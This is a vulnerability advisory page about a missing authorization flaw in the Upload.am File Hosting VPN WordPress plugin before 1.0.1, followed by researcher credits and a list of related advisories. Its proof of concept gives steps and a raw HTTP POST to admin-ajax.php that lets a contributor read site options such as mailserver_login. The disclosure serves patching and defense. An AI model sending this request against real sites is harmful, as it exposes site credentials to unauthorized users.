Upload.am File Hosting VPN < 1.0.1 – Contributor+ Arbitrary Option Disclosure | CVE 2025-12630 | Plugin Vulnerabilities

Description

The plugin is vulnerable to arbitrary option disclosure due to a missing capability check on its AJAX request handler, allowing users such as contributor to view site options.

Proof of Concept

1. As a contributor+, go to the new post screen: /wp-admin/post-new.php
2. View the page source and search the codef or `var uploadAmSettings`
3. Use the nonce to send the following post request:

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_logged_in_xxx=value

action=upload_am_get_option&option_name=mailserver_login&nonce=VALID_NONCE_HERE
```

The response will share the `mailserver_login`

Affects Plugins

upload-am-file-hosting-vpn

Fixed in 1.0.1

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Beatriz Fresno Naumova (beafn28)

Submitter

Beatriz Fresno Naumova (beafn28)

Submitter website

https://www.beafn28.es/

Verified

Yes

WPVDB ID

531537f1-5547-4b0f-9e11-3f8a0b2589f5

Timeline

Publicly Published

2025-09-29 (about 3 months ago)

Added

2025-11-04 (about 1 month ago)

Last Updated

2025-11-04 (about 1 month ago)

Other

Published

Title

Published

2022-09-20

Title

Import all XML, CSV & TXT into WordPress < 6.5.8 - Missing Authorisation

Published

2025-04-17

Title

Advanced Google Maps < 5.8.5 - Missing Authorization

Published

2024-08-20

Title

Smart Online Order for Clover < 1.5.7 - Missing Authorization to Authenticated (Subscriber+) Plugin Data Update

Published

2023-01-10

Title

Royal Elementor Addons < 1.3.60 - Subscriber+ Mega Menu Settings Update

Published

2024-11-12

Title

Hash Elements < 1.4.8 - Missing Authorization to Unauthenticated Draft Post Title Exposure